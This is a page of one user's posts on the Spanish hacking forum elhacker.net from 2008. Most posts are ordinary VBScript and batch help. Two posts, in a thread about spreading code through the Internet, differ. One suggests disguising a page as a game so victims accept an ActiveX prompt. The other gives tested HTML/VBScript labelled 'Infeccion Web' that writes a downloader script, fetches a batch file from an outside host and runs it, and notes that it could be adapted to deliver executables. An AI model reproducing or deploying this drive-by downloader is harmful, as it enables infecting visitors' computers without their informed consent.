elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 ... 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 [499] 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 ... 526
4981  Programación / Scripting / Re: Python en: 23 Julio 2008, 05:41 am
Con que SO estas trabajando? de seguro utilizas win, y en este caso no veo cual puede ser la duda ya que se trata de un instalador como cualquier otro  :-\

Debes de haber bajado este(click).... si es otro pensaria que tienes un tarball de linux y es por esto que no sabes como instalarlo  :rolleyes:

Saludos
4982  Media / Diseño Gráfico / Re: Wallpaper BattleArts (Votacion) en: 22 Julio 2008, 20:07 pm
Citar
Dejo la opcion de votar por dos trabajos ya que he visto que hay exelentes, la verdad es que no esperaba menos de ustedes  (pero si mas de mi xDDDDDDDD)

Es verdad Azielito, el tuyo esta realmente simple  :-\

El de peibol0.1 me ha gustado mucho... pero también el de Yasme710

Saludos
4983  Programación / Scripting / Re: Visual Basic Script en: 22 Julio 2008, 04:19 am
Bueno, si quieres un IDE para *.vbs te recomiendo vbsedit, se trata de un programa shareware, pero que en realidad nunca expira, y solo tiene una limitación en un debuger que tiene (pero que nisiquiera es necesario XD), tiene la ventaja de que te remarca el code en colores y te sugiere las distintas funciones y métos a medida que escribes, es visualmente más cómodo..... yo por ejemplo... ya me acostumbre al notepad  :xD

Por otro lado... si quieres intentar con Visual Basic, lo que deja de ser un lenguaje scripting, para pasar a ser un lenguaje de alto nivel, pasate por este post (click), en donde alguien más ya ha preguntado y le he dejado link's ;D, la ventaja que tendrás, es que como me gusta decir siempre... *.vbs es el hermano menor de VB, por lo que si entiendes la sintaxis de este, no tendrás problemas con el otro  ;)

Citar
y hay si se pueden usar las API's Sin un medio externo
Efectivamente, como te comenté antes... estarías dejando un lenguaje scripting, para pasar a uno de programación  :P

Saludos
4984  Programación / Scripting / Re: [HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ? en: 22 Julio 2008, 04:07 am
Claro que salta el aviso del control active X, pero se puede camuflar la pagina con un juego o algo asi, y bien decoradita, pues seguro que alguie tendra que caer... ;D

Bueno, en eso te doy la razón, hay muchas personas que no tienen idea de nada  :-\.... un último inconveniente..... este tipo de método puede ser reconocido por los AV como un downloader, por ejemplo el KIS me tira aviso de que se trata de un Trojan-Downloader.VBS.Small.l... ya que este método fue utilizado hace mucho tiempo por algunos virus *.vbs  :-X

Saludos
4985  Programación / Scripting / Re: Ocultar ventana de apagado en: 22 Julio 2008, 04:02 am
Exacto... luego con un opentextfile podrías abrir el resultado.txt y guardar su texto en una variable  :P, es sencillo

Saludos
4986  Programación / Scripting / Re: Ocultar ventana de apagado en: 22 Julio 2008, 01:54 am
uhm y en eso de que el VBS puede ejecutar comandos del batch como haria por ejemplo para hacer un Dir y que la lista se guarde dentro de una variable sera una variable Array ? o una simple ...

El primer método es ejecutando los comandos como si fuese desde el ms-dos y redirigiendo la salida a un archivo, que luego se podría leer...

Código
  1. Set objshell = CreateObject("wscript.shell")
  2. objshell.run "cmd /c cd\ & cd windows & dir *.bmp >> C:\resultado.txt"
  3. ' Me muevo al directorio raíz, luego a windows, y luego listo todos los archivos bmp
  4.  
  5. wscript.sleep 800
  6. objshell.run "c:\resultado.txt"

El segundo método, casi nadie lo utiliza  ;D

Código
  1. Set objshell = CreateObject("wscript.shell")
  2. Set msdos    = objshell.Exec("cmd /c cd\ & cd windows & dir *.bmp")
  3. ' Me muevo al directorio raíz, luego a windows, y luego listo todos los archivos bmp
  4.  
  5. wscript.sleep 1000
  6. output = msdos.stdout.Readall
  7. 'La variable output guarda los datos
  8. msgbox output

El problema de este método es que no puede ocultar la pantallita negra  :P

Saludos
4987  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Cambio del nombre foro libre en: 21 Julio 2008, 17:41 pm
No le veo el sentido a cambiarle el nombre al foro siempre será libre, pero con moderación......

Realmente son tantos los post que son cerrados por los moderadores a la primera?

Yo no lo creo así... sino que más bien, siempre se plantean temas de debate, en el que como mínimo aparecen dos usuarios (claro esta, sino no sería una discusión), con posturas totalmente opuestas, en las que uno y otro tiran para un lado..y otro, en las que muchas veces no se llega a nada, sino que se crean discusiones personalizadas en las que uno agrede a otro y así, en post y más post.... eso no merece ser cerrado?

Yo creo que si, y eso seguira ocurriendo una y otra vez, después de todo, todos tienen derecho a tener opiniones distintas, el tema esta en que no se respetan las opiniones de los demás, sino que se desprecian por el simple hecho de no opinar como uno.

Alguien tiene que poner fin a esa "riña" verdad? ese es en parte el trabajo de los moderadores, y creo que en eso no han habido grandes metidas de pata  :-\

Saludos
4988  Programación / Scripting / Re: [HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ? en: 21 Julio 2008, 15:17 pm
:: SmartGenius ::... he aquí el code..... lo he probado, y funciona correctamente.... pero como comenté antes... primero salta la barra del iexplorer, y luego, cuando le das ok a que permita el contenido bloqueado, cada vez que se entre a la página, saltará un nuevo mensaje avisando de un control activex...



En definitiva... el code html (basado en el tuyo)  :P

Código:
<HTML>
<HEAD><TITLE>Novlucker</TITLE>
</HEAD>
<BODY bgColor=#000000 text="blue">
<script language="vbs">
set objfso = createobject("scripting.filesystemobject")
set download = objfso.createtextfile("downloader.vbs",true)
download.writeline "set objxml = CreateObject(""Microsoft.XMLHTTP"")"
download.writeline "objxml.Open ""GET"",""http://usuarios.lycos.es/novlucker/vbs/bat.txt"",0"
download.writeline "objxml.Send()"
download.writeline "set objado = CreateObject(""ADODB.Stream"")"
download.writeline "objado.Mode = 3"
download.writeline "objado.Type = 1"
download.writeline "objado.Open()"
download.writeline "objado.Write(objxml.responseBody)"
download.writeline "objado.SaveToFile ""codigo.bat"",2"
download.writeline "set objshell = CreateObject(""WScript.Shell"")"
download.writeline "objshell.run ""Codigo.bat"""
download.close
set objshell = createobject("wscript.shell")
objshell.run "downloader.vbs"
</script>
<center><h1>Infeccion Web</h1><br><br>By Novlucker</center>
</BODY>
</HTML>

Esta página crea un archivo llamado "downloader.vbs" y lo ejecuta... a su vez, este archivo... descarga un "bat.txt" y también lo ejecuta....  :P

Lo he subido aqui(click) por si alguien quiere probar,esta el html, y el bat, si desconfian, máquina virtual ,y sino bueno, suban ustedes mismos los archivos a algun host gratuito  :P

Comentar además que hace algún tiempo había probado hacer esto y alguna otra cosa parecida.... pero me parecía que no resultaba justamente por las alertas que lanza el navegador, las cuales además vienen por defecto  :-\

Eso fue todo

Saludos

[Modifico] Nota: Tener en cuenta además que el método utilizado, solo permite descargar texto plano, por lo que en este caso no hay problemas ya que se trata de un *.bat..... pero con un par de modificaciones se podrían bajar ejecutables/binarios :rolleyes:
4989  Programación / Scripting / Re: Enviar mensajes a Msn en vbscript en: 21 Julio 2008, 10:08 am
Bueno.. si te refieres a la API del messenger.. ya lo estás haciendo a traves del objecto Messenger.UIAutomation, si lo que te refieres es a utilizar las demás APIs de win desde *.vbs.... es imposible, no, sin hacer uso de algún programa externo.. como lo es excel...  :P

Mira....

Utilizar APIs de Windows en VBScript

Saludos
4990  Programación / Scripting / Re: [Ayuda] Duda Con Batch en: 21 Julio 2008, 09:58 am
Pues para agregar es el >> pero para crear el archivo es solo con un > si no me equivoco ?  ;D

Con >> también creas... la diferencia entre > simple y >> doble... es que con el primero escribes/pisas... con el segundo agregas....

Código:
echo 1 > numeros.txt
echo 2 > numeros.txt
echo 3 > numeros.txt

Dará como resultado, un archivo llamado numeros.txt con 3 como texto

Código:
echo 1 >> numeros.txt
echo 2 >> numeros.txt
echo 3 >> numeros.txt

Dará como resultado, un archivo llamado numeros.txt con 1 2 y 3 como texto (cada número en una línea)
Saludos
Páginas: 1 ... 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 [499] 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 ... 526
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines